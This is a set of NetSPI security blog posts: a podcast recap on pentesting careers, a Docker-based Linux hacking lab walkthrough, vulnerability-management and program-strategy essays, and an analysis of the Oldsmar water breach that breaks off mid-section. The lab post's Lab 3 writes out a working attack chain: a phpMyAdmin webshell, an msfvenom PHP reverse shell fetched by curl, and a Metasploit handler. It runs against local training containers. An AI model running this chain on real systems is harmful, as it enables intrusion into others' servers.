Back

Lessons Learned Building a Penetration Testing Program: OWASP Portland, OR Podcast with NetSPI’s Nabil Hannan

NetSPI Managing Director Nabil Hannan was featured on the Open Web Application Security Project (OWASP) Portland, Oregon Chapter podcast. During the interview, Nabil and the hosts, David Quisenberry and John L. Whiteman, discuss mentorship, advice for entry-level pentesters, security hiring amid the cyber security skills shortage, advice for companies building a security program, cyber security policy, and more. Listen to the full episode or continue reading for highlights from the conversation.

John: A lot of people in our chapter want to be pentesters. What advice do you have for them, especially coming from your direction as a consultant?
Nabil: When I built a pentesting practice, I was tasked with hiring and training a team of pentesters. The saying I picked up from that experience is, “I can teach someone to be smart, but I can’t teach someone to be clever.” So, if you want to be a pentester, truly a pentester that’s finding interesting and unique things, it requires you to think creatively and think outside the box. The technical part of pentesting can be learned or acquired, or you can get help, but it ultimately is someone that is clever who succeeds at pentesting.

John: Are there certain security domains that we simply don’t have enough skilled people for?
Nabil: Today, there is demand for security professionals in general across every domain. It is evident that we have a shortage in security expertise across the board. Security is still in its infancy. If you want to get in, regardless of which area, whether you want to test autonomous cars, or mobile applications, or medical devices, there’s a need for security in all of those things. What I would recommend to people is, figure out what you are truly interested in and figure out if there is an area or a domain that really excites you. Find something that you understand and are passionate about and decide if the security aspect is a fit for you.

John: Has there ever been a time where you have been challenged with communicating results or recommendations to clients that may have differing levels of security understanding?
Nabil: It’s a common situation that we find ourselves in. You have to speak the right language for your audience. And if you are not doing that, it can be a challenge. It’s even more challenging when you have multiple levels of people in your audience that have varying degrees of technical or security understanding.

An example that comes to mind is a secure code review assessment I completed where we found cross site request forgery (CSRF). Nobody seemed to pay attention to it because we rated it medium severity given you had to be authenticated to really do any harm. The leadership team came to us, and said, let us know if you find anything critical, then we will decide if we need to push the production date. We replied, the vulnerability may not be critical, but it can still cause a lot of damage. To communicate the severity of the damage effectively we decided to create a proof of concept to show the impact and we were able to effectively show how easy it would be to exploit that vulnerability. As a result, they pushed their deployment to focus on remediation and better secure the application, based on our recommendation.

John: Its exploits that speak louder than words, if you just give two-dimensional bug numbers or risk rating, it doesn’t mean anything until you bring it to life as what you did here.
Nabil: As a consultant, your job is to help people understand what the true impact is based on the business that is being supported. Make sure you’re speaking the right language, the right message, and the impact defined from the business perspective and the technical perspective.

David (aka: Quiz): We often get asked by the young people in our chapter, do you need to have some time as a developer before going into something like pentesting?
Nabil: There are two ways to think about it. I come from a software development background and when I look at vulnerabilities, I can dissect them by really understanding the inner workings of the software and where it failed. If you don’t have software development experience, you can still be a tester. You can still run scripts, you can probably still run tools, and you can learn basic scripting to build automation and identify vulnerabilities. If you want to be an application pentester, chances are if you have a better understanding of how software systems are built, it will give you an advantage in coming up with creative ways to make those systems break. Is it a requirement? I don’t think so. But some of the best pentesters I know do come from a software development background.

John: What advice do you have for companies building a security program?
Nabil: Being in the security space, people naturally think security is the most important thing. That being said, when trying to figure out what’s the right security strategy for your organization, you first have to learn how the business makes money. That’s the first thing you need to learn as a security professional.

Then, align your security practices and efforts to enable the business to be better versus thinking of security as something separate. Organizations that are more immature or just getting started with security often view it as a roadblock or cost center, something that is going to only slow them down. But more mature practices adopt security culture over time and incorporate it into their processes. They learn do it in a way where it enables the business. This allows you to have a program that is mature, with security integrated. Understand the appetite for the organization and what threshold of risk you are willing to take when designing and defining the program. Try as hard as possible to make security a part of the process without it becoming a friction point for the business to function. For example, trigger out-of-band activities for security reviews in an automated fashion that won’t block your business flow and understand your risk appetite and have the ability to stop a business process from going forward if it is too risky. Being able to build that level of culture, communication, buy-in, and metric alignment is key.

John: …Should this process start with policy?
Nabil: Policy comes from somewhere even more important. It comes from your customers. Ask what security expectations your customers have. Then, depending on the business, there’s also regulation and compliance. Based on these two components, you need the right structures of leadership and culture to get buy-in across the organization to make security a part of your regular workflow versus it being a separate function.

Quiz: A challenge I have had this past year, is ensuring our security conversations are communicated correctly to others… product, customers, engineering, leadership, etc.
Nabil: Human behavior is something that I am fascinated by – how people can react to the same message but deliver it differently.

At NetSPI, our Resolve™ threat and vulnerability management platform is used by many of our customers internally to track and communicate their program metrics and dashboarding. If you start showing metrics like number of open vulnerabilities by business unit, it creates a very different effect than if you were to name the open vulnerabilities with the leader of that business unit. It builds a sense of competition to be better. When we work with customers to build threat and vulnerability management programs, security champions, or training curriculum, we try to focus on the human element of it to get people excited to improve their security posture rather than see it as a hinderance.

Quiz: What were your favorite Agent of Influence podcast episodes to date?
Nabil: My favorite was the first podcast episode I did with Ming Chow, a professor at Tufts University. We talked about computer science and education around security and we even touched around interesting topics such as, how he feels about teaching someone who could potentially do bad things.

During the episode with the former CISO of the CIA Bob Bigman, he provided really great insights around the life of the CISO, what they do, and what they have to live through. He helped define and change the focus of the CISO career.

Jeff Williams, the CTO of Contrast Security was a good one, too. Him and I recently did a joint webinar, How to Streamline AppSec with Interactive Pentesting.

And Quiz, I’m not saying this because you’re on this interview, but your interview was great too. Especially the book recommendations near the end. I had friends reach out the day it posted telling me how much they enjoyed the interview.

Back

Dockerizing the NetSPI Linux Labs

Learning penetration testing takes time and specialized resources. Any experienced tester knows that once they have the academic knowledge of how a vulnerability could work, they’re itching to try it out in the real world – but they often lack the specialized (read: safe, legal) environment to apply their newfound knowledge. To help make that process easier, NetSPI is releasing several vulnerable Docker images and associated NetSPI lab walkthroughs that can be used to learn and practice offensive techniques against technologies commonly seen in real-world environments.

If you’re not familiar with Docker, check out the links below to get started.

For those unfamiliar with Scott Sutherland‘s existing Linux Hacking Case Studies blog series, Scott put together a series of labs that focus on exploiting common Linux issues. To make the lab environments a little easier to spin up, we’ve converted these labs into Docker images.

If you already have a base skill-set in penetration testing but want to increase your abilities in exploiting Linux-based systems, then these labs are for you. If you’re reading these titles and scratching your head at some unfamiliar terms, read the accompanying blog links first, then run through the labs to get a better understanding of the vulnerabilities.

For some of the following labs, two Docker images are used. One of the Docker images is used to run the container for the lab itself, and the other contains the msf_base image that is used to run the container for the attacker and contains the Metasploit framework necessary for doing so.

These instructions were created with the intent that you are running Windows, with WSL2 for necessary Linux operations, as well as Docker for Windows.

Lab 1: Attacking insecure Rsync configurations

In Lab 1, the participant learns about Rsync – a commonly used file copy/sync utility present on many Linux distributions.

Installation/Run Instructions

  1. Pull and run the Lab 1 Docker container, which spins up a vulnerable Rsync server.
    $ docker run -dit --rm netspi/lab1 bash
    Unable to find image 'netspi/lab1:latest' locally
    latest: Pulling from netspi/lab1
    692c352adcf2: Already exists 
    [TRUNCATED]
    3af53b42f112: Pull complete 
    4530eae3603e: Pull complete 
    Digest: sha256:d04c06f733cd5cfc00d619178fd7b09ade053ce9563e1b77b0dcc99f222bc28d
    Status: Downloaded newer image for netspi/lab1:latest
    f6086037b4e4a7b3ee30fc6957881225415d8a78840049ca1b44b2d5638d7daa
  2. Grab the container ID of the netspi/lab1 container.
    $ docker run -dit --rm netspi/lab1 bash
    Unable to find image 'netspi/lab1:latest' locally
    latest: Pulling from netspi/lab1
    692c352adcf2: Already exists 
    [TRUNCATED]
    3af53b42f112: Pull complete 
    4530eae3603e: Pull complete 
    Digest: sha256:d04c06f733cd5cfc00d619178fd7b09ade053ce9563e1b77b0dcc99f222bc28d
    Status: Downloaded newer image for netspi/lab1:latest
    f6086037b4e4a7b3ee30fc6957881225415d8a78840049ca1b44b2d5638d7daa
  3. From another terminal, record the IP of your Lab 1 docker container. You’ll use this IP as a target for Nmap scans later in the lab.
    $ docker inspect [container ID] | grep -F -m 1 \"IPAddress\":
                "IPAddress": "172.17.0.2",
  4. Now pull and run your msf_base container, launching into an interactive bash shell.
    $ docker run -it --rm netspi/msf_base bash 
    Unable to find image 'netspi/msf_base:latest' locally
    latest: Pulling from netspi/msf_base
    692c352adcf2: Pull complete 
    [TRUNCATED]
    fb2fa6eca858: Pull complete 
    Digest: sha256:2ec64fb7fa8c05c8e5b6b746539f6bd0bb52f9d6feaf98ff9ab2868adefca5c0
    Status: Downloaded newer image for netspi/msf_base:latest
    root@32be66de5038:/#
  5. Continue by following the lab here, using the Lab 1 container as the target host and the msf_base container as the attacking host: https://blog.netspi.com/linux-hacking-case-studies-part-1-rsync/ .
  6. After you have finished the lab, be sure to stop your container to avoid taking up resources. (Note that the container can be referenced using the first four characters of the ID returned after pulling and running the new container in step one.)
    $ docker stop f608
     f608

Lab 2: Attacking insecure NFS exports and setuid configurations

Lab 2 will walk would-be Linux masters through attacking some common vulnerabilities in two widely used technologies/protocols – NFS exports and setuid configurations. One unique aspect of this lab includes using a little imagination.

In a perfect world, the lab would involve two separate Docker containers – one representing the attacker computer (running Metasploit) and a second representing the target (hosting the NFS exports).

However, nfs-client utilities such as rpcinfo and showmount don’t have the ability to communicate across Docker containers, so NetSPI reworked the attack scenario to give lab users the closest possible real-world approximation in this format. Both the target and the attacker are located in the same Docker container, so the attacker should execute the attack path outlined in the blog post linked below against 127.0.0.1.

Installation/Run Instructions

  1. Pull and run the netspi/lab2 image in privileged mode.
    $ docker run --privileged --rm -d netspi/lab2
    Unable to find image 'netspi/lab2:latest' locally
    latest: Pulling from netspi/lab2
    692c352adcf2: Already exists 
    [TRUNCATED]
    89f04cf1b6f3: Pull complete 
    Digest: sha256:be6363a0aa1715aa0a97824b131aa620c7509e47668bc5d1475c1985fb6d98be
    Status: Downloaded newer image for netspi/lab2:latest
    dd68291be63abd1ec4ffe6f9c55154106a9d708824d0a6bdd40286515548b5a7
  2. Run an interactive shell in the container noted above.
    $ docker exec -it dd68291be63abd1ec4ffe6f9c55154106a9d708824d0a6bdd40286515548b5a7 bash
  3. Proceed to the instructions in this lab: https://blog.netspi.com/linux-hacking-case-studies-part-2-nfs/. Note that you should skip the steps in which you log in to the target host using SSH, as both our target host and attacking host are one and the same due to the limitations of Docker described above.
  4. After you’re finished with the lab, stop the container.
    $ docker stop dd68
    dd68

Lab 3: Attacking insecure phpMyAdmin configurations and world-writable files

The steps in Lab 3 will teach students how to attack phpMyAdmin instances found during routine port scans. The steps to complete the lab represent a significant departure from the attack path discussed in the blog linked below, though they exhibit the same concepts.

Installation/Run Instructions

  1. Pull the netspi/lab3 image with Docker
    $ docker pull netspi/lab3
  2. List the Docker images and note the ID for the lab3 image
    $ docker images
    
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    netspi/lab3         latest              4d30e4fe9cb9        6 months ago        975MB
  3. Run the lab 3 Docker image using the previously noted image ID, making sure to expose port 80 so the MSF container can access the phpMyAdmin service on the vulnerable container (netspi/lab3). Be sure to use docker inspect to note the IP address of the container for later.
    docker run -dit -p 80:80 [image ID]
  4. In a separate terminal, start a session within the MSF container to use as your attacker machine.
    $ docker run -it --rm netspi/msf_base bash                  
    root@e6cfb4c91a9f:/#
  5. Note the IP of the msf_base image you just spun up, you will need this later.
    $docker ps
    CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
    3ab944f8c546 1df49e2310ff "bash" 9 minutes ago Up 9 minutes 0.0.0.0:4444->4444/tcp great_swirles
    e4ef60c9518d netspi/msf_base "bash" 12 minutes ago Up 12 minutes objective_austin
    14469fadfd40 4d30e4fe9cb9 "/run.sh" 13 minutes ago Up 13 minutes 0.0.0.0:80->80/tcp, 3306/tcp romantic_williamson
    
    $docker inspect e4ef60c9518d | grep -F -m 1 \"IPAddress\":
    "IPAddress": "172.17.0.3
  6. Using a web browser on the computer you’re running all your Docker containers on, navigate to https://127.0.0.1/phpmyadmin/index.php
  7. Follow the attack vector detailed in Scott’s blog here to brute force the password to the phpMyAdmin instance, as well as write a webshell in SQL to upload to the same instance’s backend. After you have written the webshell, refer to attack setup below to continue the exploit.

Attack Setup

The way phpMyAdmin was ported to Docker containers precludes an attacker from generating a reverse shell via cron job as depicted in Scott’s blog. To mitigate this problem, an alternative exploit was developed. The cmd.php file you just uploaded contains the curl command that will reach out and and pull a hosted reverse shell from a simpleHTTPServer running on the MSF Docker container you spun up above – this effectively replicates the backdoor outlined in Scott’s blog, but within the constraints effected by running phpMyAdmin on Docker. Using Docker to do all this means you don’t have to go through troubleshooting a phpMyAdmin install, etc. and can focus on learning the exploit itself.

  1. In a third terminal window, open an msfconsole bash container with port 4444 exposed
    $ docker run -it --rm -p 4444:4444 {msf_base ​​​​image ID}​​​​  bash
  2. Generate a reverse shell with the msfvenom module
    1. Use a separate terminal window to grab the LHOST value for the msf_base container running with port 4444 exposed.

      $ docker inspect {lab3 container ID} | grep  -F -m 1 \“IPAddress\“:
      "IPAddress": "172.17.0.3,

       

    2. Generate the reverse shell using the same msf_base container that you plan to use to serve the simpleHTTPServer in the next step.

      $ msfvenom -p php/meterpreter_reverse_tcp LHOST=172.17.0.3 LPORT=4444 -f raw > reverseshell.php
  3. In the MSF Docker container you started earlier, spin up a simple Python HTTP server to host the reverse shell file. This allows you to curl the reverse shell from the victim computer.
    $ python -m SimpleHTTPServer 8088
  4. In the GUI located at https://127.0.0.1/phpmyadmin/cmd.php, use the webshell uploaded previously to curl for the reverseshell.php file that was just created in the MSF container. The IP address should be the IP of the Docker container you pulled in step 5 of the installation instructions.
    $ curl docker_container_IP:8088/reverseshell.php -o reverseshell.php

    If you performed the above steps correctly, you will see the resulting GET request from the curl command be processed by the SimpleHTTPServer.

  5. Open another terminal window and access the same MSF container using the following steps:
    1. List all your running Docker containers
      $ docker ps 
      CONTAINER ID   IMAGE             COMMAND     CREATED          STATUS          PORTS                          NAMES
      f3c1bdede660   4d30e4fe9cb9      "/run.sh"   4 minutes ago    Up 4 minutes    0.0.0.0:80->80/tcp, 3306/tcp   eloquent_bell
      5623af2f7ecf   netspi/msf_base   "bash"      33 minutes ago   Up 33 minutes   0.0.0.0:4444->4444/tcp         goofy_noyce
    2. Access the bash terminal of the running msf_base container that has port 4444 exposed.
      $ docker exec -it 5623af2f7ecf bash 
      root@5623af2f7ecf:/#
  6. Set up a listener on the MSF container using the new bash terminal you just opened. (The window not currently running the SimpleHTTPServer on port 8088). The LHOST IP should match the IP of the msf_console Docker container that has port 4444 exposed.
    $ root@5623af2f7ecf:/# msfconsole
    $ msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    $ msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
    PAYLOAD => linux/x64/meterpreter_reverse_tcp
    $ msf6 exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    $ msf6 exploit(multi/handler) > set LHOST 172.17.0.3
    LHOST => 172.17.0.3
    $ msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 172.17.0.3:4444
  7. Navigate to https://127.0.0.1/phpmyadmin/reverseshell.php
    1. Go back to your MSF container and type shell to open a shell. Then run a bash command to confirm that you have bash control of the phpMyAdmin console.
      $ shell
      $ whoami
      www-data
  8. Congratulations, you now have a reverse shell running on the target host.

Lab 4: Different ways to approach SSH password guessing and attacking sudo applications

Lab 4 will teach you to attack SSH passwords and sudo applications, and is perhaps the most accessible to those who are new to penetration testing.

Installation/Run Instructions

  1. Pull and run the Lab 4 Docker container.
    $ docker run -dit --rm netspi/lab4 tail -f /dev/null 
    Unable to find image 'netspi/lab4:latest' locally
    latest: Pulling from netspi/lab4
    692c352adcf2: Already exists 
    [TRUNCATED]
    d759bf5b0446: Pull complete 
    Digest: sha256:eca1ff10dcbcaf2aec164cb97f447c94853259d989ee122b271ab0325ffcef66
    Status: Downloaded newer image for netspi/lab4:latest
    944da34600eb9cf03b6dfc4423494897b0625974894039ef6a5e330d9955ca67
  2. Pull and run the msf_base container.
    $ docker run -it --rm netspi/msf_base bash 
    root@2bed01938a23:/#
  3. Proceed to the instructions in this lab: https://blog.netspi.com/linux-hacking-case-studies-part-4-sudo-horror-stories/. All commands from here on out can be run from the msf_base container.
  4. Once you have finished the lab, be sure to stop the container(s).
    $ docker stop 944d
    944d

Lab 5: Summary

Created with docker-compose, this lab is simply a consolidated way of running labs 1-4 and creating an msf_console container all in one swoop. Following the instructions below, docker-compose will create and start labs 1-4 as well as present you with an msf_console container from which to test. From there, follow the blog posts for labs 1-4 any time you get stuck!

Installation/Run Instructions

  1. Clone the Github repository
    $ git clone git@github.com:NetSPI/NetSPI-Docker-Labs.git 
    Cloning into 'NetSPI-Docker-Labs'...
    remote: Enumerating objects: 33, done.
    remote: Counting objects: 100% (33/33), done.
    remote: Compressing objects: 100% (30/30), done.
    remote: Total 33 (delta 0), reused 33 (delta 0), pack-reused 0
    Receiving objects: 100% (33/33), 8.97 KiB | 4.48 MiB/s, done.
  2. cd to the Lab 5 directory in the repository you just cloned.
  3. Run the Docker compose command to build and run the necessary images
    $ docker-compose up -d
    Creating network "lab5" with driver "bridge"
    Pulling lab3 (netspi/lab3:)...
    latest: Pulling from netspi/lab3
    c64513b74145: Pull complete
    01b8b12bad90: Pull complete
    [TRUNCATED]
    b74cb7320347: Pull complete
    0b77cb4369b4: Pull complete
    9e2e5286c54e: Pull complete
    Digest: sha256:303d80067ad6ad5e07fd3d1e7d2b67e32fec652d374f44ea9458098ba085c6f0
    Status: Downloaded newer image for netspi/lab3:latest
    Creating lab5_lab3_1 ... done
    Creating lab5_lab1_1 ... done
    Creating lab5_lab2_1 ... done
    Creating lab5_lab4_1 ... done
  4. Obtain the IP addresses of the launched containers for further use in attack scenarios.
    $ docker network inspect lab5 | grep '"Name": \| "IPv4Address": "'
    "Name": "lab5",
    "Name": "lab5_lab1_1",
    "IPv4Address": "172.18.0.5/16",
    "Name": "lab5_lab3_1",
    "IPv4Address": "172.18.0.4/16",
    "Name": "lab5_lab4_1",
    "IPv4Address": "172.18.0.3/16",
    "Name": "lab5_lab2_1",
    "IPv4Address": "172.18.0.2/16",
  5. Start the MSF container in the same network as the other lab5 containers
    $ docker run -it --network=lab5 netspi/msf_base bash
    root@0bea0cb52b2a:/#
  6. After you’re done with the labs, take down the containers. Be sure to run this command from the same folder you launched the containers from originally.
    $ docker-compose down

Conclusion

Congratulations on getting this far – you’re ready to start learning. Take your time, read the blogs carefully, and proceed with *some* caution. For more penetration testing news and resources, follow NetSPI on Twitter, and if you’re having any issues with the labs that you want to ask us about, give us a shout on the GitHub repository for the labs! Finally, a huge thanks to Scott Sutherland, Emerson Drapac, Rafael Seferyan, and Bjorn Buttermann for the mountain of work they did creating these labs and the blog posts they’re based on.

Back

“So What?” – The Importance of Business Context in Vulnerability Management

In the first installment of my vulnerability management blog series, I discuss the pitfalls of not having a vulnerability testing and tracking strategy and the serious consequences of failing to recognize what is meaningful to the business. In part two of the series, I will expand on the idea of recognizing what is meaningful to the business and discuss the importance of business context in vulnerability management.

It sounds nebulous, and for good reason. From my observations over the years, I’ve heard claims that the best approach to cyber security is either 1) purchasing more technology to keep ahead of the latest vulnerabilities or 2) changing behaviors that pose the most risk, such as clicking on unknown links or using stronger passwords. While there is a place in a security program for these and other security measures, time and budget constraints create major barriers. Instead of asking, “which new technologies do we need to add to our security stack?” or “why isn’t my organization getting a perfect score on our phishing assessments?”, the most important question that needs to be asked is, “So what?”

“So what?” is arguably one of the most elemental and important criteria in any cybersecurity situation, from policy to technical security controls. The question forms the basis of nearly every security decision and requires alignment to core business objectives to be determined and applied before a direction is taken. Recognizing how each security decision impacts your business is vital. To understand the importance of “So what?” we must first understand its place in your cyber security strategy.

Strategy is another concept that can mean different things to different people, in part because there is not a standard approach to cyber security program development. Each business has different security needs. As security leaders, we address the threats that pose imminent and perceived harm to the environment, and those that get noticed most, get attention first. And understandably so, given the ever-advancing threats companies face. Often is the case, however, that what is considered harmful to the environment is not always rooted in what is most important, or what poses the most risk to a business. That is where a business-aligned vulnerability management program comes into play.

How to Achieve a Business-Aligned Vulnerability Management Program

A business-aligned vulnerability management program takes into consideration the vulnerabilities that would have the most significant, negative impact on the business, the most relevant threats that could exploit those vulnerabilities, how to remediate, as well as the controls needed to counter those threats. Such a strategy is built on a framework that enables, implements, and maintains the program and informs all security initiatives, controls, and processes.

Once a business-aligned vulnerability management program is in place, we can ask, “So what?” when considering a potential risk, a discovered vulnerability, a detected event, a proposed initiative, or virtually any other consideration affecting security posture. Let’s look at a few hypothetical vulnerability findings:

Vulnerability FindingSo What?Remediation Recommendations
Poor Administrator Account PasswordAttacker can gain access to and steal data. Poses enterprise risks to information, business operations, regulatory compliance, and business reputation. Regulatory non-compliance leading to financial sanctions. Legal action by affected customers leading to financial reparations.Change the admin password. Strengthen the admin password. Use multifactor authentication. Use “zero trust” access model. Purchase technology to enhance identity and access controls. Conduct vulnerability testing more often.
Vulnerable Version – PHPSuccessful exploitation of available vulnerabilities may allow a remote unauthenticated attacker to execute arbitrary commands directly or indirectly on the affected systems. As a result, the confidentiality, integrity, and availability of the affected systems and associated data may be compromised.Disable or uninstall PHP if it is not required for a defined business purpose. If PHP is required, upgrade to the latest stable version of the software or apply vendor supplied patches. If no fix is available, contact the vendor for solutions and consider isolating the affected service via host based and network firewalls.
SQL InjectionSQL injection may allow an attacker to extract, modify, add, or delete information from database servers, causing the confidentiality and integrity of the information stored in the database to be compromised.Depending on the SQL implementation, the attacker may also be able to execute system commands on the affected host. In some circumstances, this provides the means to take control of the server hosting the database, leading to the complete compromise of the confidentiality, integrity, and availability of the affected host.Employ a layered approach to security that includes using parameterized queries when accepting user input. Strictly define the data type that the application will accept. Also, disable detailed error messages that could give an attacker information about the database. Additionally, following the principle of least privilege when assigning permissions for the service account and database user helps limit the impact of a successful SQL injection attack.

Eliminate the “So what?” column and it becomes difficult to choose which vulnerability to prioritize. Taking these examples further, we can use this same strategy to determine what the ramifications are for conducting certain types of vulnerability scans, from the resources needed to conduct the test to the large number of vulnerability instances that will require analysis. For example, if you target scans to detect just the vulnerabilities that pose a significant answer to “So what?” or in other words, has a major impact on the business, you can focus your resources – people, time, money – on the meaningful measures to manage risk to the business.

This is all ties back to risk-based security. By now, the security industry understands why risk-based security strategies are more effective than compliance-based strategies, but are often challenged as to how to make the shift. To mature your security program and achieve a risk-based strategy, it is essential to align business logic with vulnerability management and prioritize the vulnerabilities that pose the highest risk specific to your business.

Back

RSA Conference: Striking the Balance between Automation and the Human Touch in Penetration Testing

On March 19, 2021, NetSPI Chief Operating Officer (COO) Charles Horton was featured in RSA Conference:

Navigating how to reap the benefits of automation and when to use manual processes is an age-old cybersecurity challenge. How can organizations achieve efficiencies without the support of automated technologies? How can they ensure they’re getting the most thorough coverage without the human touch? In my opinion, it isn’t an either-or. Organizations need both automation and manual strategies to ensure their assets are protected from cyberattacks, and there is much to learn from the penetration testing community.

Pentesting is a great example of the importance of collaboration, not only between humans, but also between humans and machines. Penetration testing can be a balance of automation and manual efforts so that a cybersecurity program pays dividends.

Read the full RSAC article to better understand the benefits (and potential limitations) of using the different approaches alone and learn how to strike balance between automation and manual efforts.

Back

4 Ways to Avoid Getting Too Comfortable with Your Cyber Security Program

If you work in cyber security, you know that an organization can have an incredibly mature or sophisticated security program and still experience a breach. There is no silver bullet to prevent this type of event at your company, but over the years I have found ways to continue to push our program forward and never get comfortable with where we are at.

I had the pleasure of sitting down with NetSPI’s Nabil Hannan to discuss some of those strategies as part of the Agent of Influence podcast. During our conversation, we discussed four strategies to stay focused on the highest priority actions and help keep a company safe.

1. Leverage and Listen to Your Red Team

You can learn a lot about your security program from red team engagements – namely, its areas of strength and weakness. Red teams can come up with some fantastic attacks against your company and open the door to new security considerations your blue team hadn’t thought of. You don’t necessarily need a large team to succeed at red teaming. At Code42, we have two people responsible for our red team engagements. And if you don’t have an internal red team, find a partner to collaborate with you on the engagement.

Many red teams today are leveraged for a standard monthly kill chain exercise. That’s a great practice, but try leveraging your red team for a larger, more complex engagement. An engagement that emulates the most likely attack against your organization will force them to think creatively about how to carry that attack out and how to prevent it from happening to your organization.

2. Perform Regular Threat Assessments

The second activity I encourage is to establish regular threat assessments. As security leaders, we can get stuck doing simple, straightforward compliance assessments. While compliance assessments can uncover a lot of risks, you start with a list of requirements rather than starting with what could go wrong at the company – and sometimes those don’t align.

In my current role as CIO and CISO at Code42, we do the traditional controls assessment, maturity assessment, and we use NIST, ISO, among other compliance frameworks. In addition, we take time every year to bring different leaders from various parts of the organization together, along with security experts from production and research and development (R&D), to complete a deep dive threat assessment. On this brainstorming day, we discuss all the terrible things that could happen to our company and assess what controls and processes we have in place – or do not have in place – for prevention and incident response. From there, we create a laundry list of actions to prioritize and ensure we improve our security posture.

3. Prioritize Existing Security Gaps, Then Do a Benchmarking Exercise

When building out a security program, chances are you have existing security gaps. My advice is to find and fix those first. For example, the volume and magnitude of risk from email phishing was prevalent when I first started as a CISO. So that’s where we started.

There are going to be security issues that are obvious. I think it’s important to tackle those right off the bat and earn some quick wins for your team. After that, pause and do a benchmarking assessment to figure out what activities to prioritize next. A benchmarking assessment is particularly important to do when things become less clear as to what to go after. Many leaders start with benchmarking – hear Nabil’s take on the timing of benchmarking during our podcast conversation – but I have the opposite advice. If you know what’s broken and you’re hearing about it, that’s where you should start.

4. Understand That The Importance of Application Security Has Never Been Greater

My team spends a majority of our time on application security. Why? Because that is where the majority of our risk lies today. There are a couple shifts in application security that are worth paying attention to.

First, is the rise of the serverless concept. This means that an application can be built where we don’t have to connect to the underlying OS and/or database aspects of it, which expands the attack surface at the application layer. It is more important than ever to focus on protecting the application layer knowing that the attack surface is expanding there today.

Another application security focus area that is incredibly important is to figure out where to plug in security resources and security scanning processes into your development lifecycle. At Code42, we built a standalone product application lifecycle security embedded within our R&D team. They’re part of the scrum teams, listening to the story mapping, embedding testing early on, and bringing up security concerns. I believe that the more security is seen as a partner and embedding themselves early on with development teams, the better. Security is still considered the outsider in many organizations, but we’re starting to be part of the larger development team at Code42. In a dream world, I would love for developers to be security developers – that’s utopia.

The speed at which applications are being built, updated, and deployed is always going to be a constant challenge for security. This ties back to the idea that comfort is the enemy. As security professionals, we need to continuously evolve and evaluate our security program to protect against adversaries. If you become too comfortable with your program, it’s likely that there’s something you’re missing.

Back

Key Takeaways from the Florida Water Facility Hack

Now that the dust has settled on the recent Oldsmar, Florida water treatment facility breach, let’s take a deeper look at some of the lessons we can learn from the incident.

For those unfamiliar with the breach, on February 5, hackers accessed a Florida water facility that treats water for around 15,000 people near the Tampa area. The hackers were able to increase the amount of sodium hydroxide, or lye, distributed into the water supply, which is dangerous to consume at high levels. Luckily, there was an attendant that noticed the suspicious behavior and reported it, mitigating the breach without consequence.

They gained access to the computer system through TeamViewer, a popular remote access software application commonly used for remote desktop control, screen sharing, online meetings, and file transfers. Third party IT support is a common use case for TeamViewer and, according to its website, it has been installed on over 2.5 billion devices today. There has not been confirmation on how the attacker got ahold of the remote access system credentials, but we can speculate that an employee of the water facility fell victim to a social engineering attack, such as phishing.

Given the breach itself was not sophisticated and its impact was minimal, many in the cyber security community are surprised that this is making national headlines. But it is the potential of what could have happened that is causing a panic – and rightfully so.

Investigative journalist Brian Krebs interviewed a number of industrial control systems security experts, and discovered that there are approximately 54,000 distinct drinking water systems in the U.S. Of which, nearly all of them rely on some type of remote access to monitor and/or administer these facilities. Additionally, many of these facilities are unattended, underfunded, and do not have 24/7 monitoring of their IT operations. In other words, this type of breach is likely to happen again and, if we don’t take the necessary security considerations into account, the consequences could be devastating.

The industrial control systems and utilities notoriously prioritize operational efficiencies over security. This is a wakeup call for the industry to start looking at their systems from a security and safety perspective. To get started, here are the key lessons I learned from the incident.

Lessons Learned from the Florida Water Facility Breach

Many of the reports written about the breach are centered around remote access. That is not surprising as the security concerns of remote access and host-based security have escalated amid COVID-19. Host-based security represents a large attack surface that is rapidly evolving as employees continue to work disparately.

Think back to March 2020. Organizations needed to get people online fast and began enabling Remote Desktop Protocol (RDP) which is known to be vulnerable. Cyber security firm Kapersky found that the number of brute force attacks targeting RDP rose sharply after the onset of the coronavirus pandemic. Further, internet indexing service Shodan reported a 41 percent increase in RDP endpoints available on the internet as the virus began to spread. When determining the type of remote access to give systems the decision should be based on the level of security desired and which type of remote access is deemed appropriate.

That being said, in my opinion there is more to learn from this incident beyond the remote access system vulnerabilities.

It is critical to analyze your security program holistically

These systems are complex and require a design-level review to understand what could go wrong rather than completing ad hoc security assessments that look at the technology separately.

For example, say you performed an assessment of your desktop images and are notified that you have TeamViewer installed as a potential risk. This is something that is likely to get written off as a valid use case because it is how the IT team accesses the computer to troubleshoot operational issues remotely. Unless you assess all the systems involved in the environment and how they work together, it can be difficult to understand the risk your organization faces.

This is where threat modeling and design reviews prove vital. According to software security expert Gary McGraw, 50 percent of application security risks come in the form of software design flaws that cannot be identified by automated means. Threat modeling and design reviews leverage human security experts to evaluate your program in its entirety and provide you with an understanding of the current level of security in your software and its infrastructure components. Threat modeling in particular analyzes attack scenarios, identifies system vulnerabilities, and compares your current security activities with industry best practices. And with a design review, you gain clarity on where security controls exist and make strategic decisions on absent or ineffective controls.

Defense in depth is non-negotiable

The software the facility uses to increase the amount of sodium hydroxide should have never been able to reach dangerous levels in the first place. When software is developed, it should be built with security and safety in mind. For example, the maximum threshold should be an amount of sodium hydroxide that is safe, not one that is potentially life-threatening.

What if it was a disgruntled employee that decided to change the amount of sodium hydroxide? Or if the technology attendant had been bribed? The outcome of the situation would have looked much different.

It’s a best practice in security to create as much segregation in your operational technology (OT), or technology that physically moves things, and information technology (IT), the technology that stores and manages data, to avoid incidents that could result in physical harm. To achieve this, defense in depth is essential.

Defense in depth is a cyber security approach that layers defensive controls to ensure that, if one control fails, there will be another to prevent a breach. Authentication and access management are protections at the front line of a defense in depth strategy and a critical security pillar for industrial control systems and utilities. For systems or tasks that can have a detrimental impact if breached, add multiple layers of authentication so that not one computer or one individual can carry out the task. Additionally, adopting the concept of Least Privilege, or only allowing employees access to the minimum number of resources needed to accomplish their tasks, would be a good practice to implement industry wide.

We are not prepared for disaster scenarios

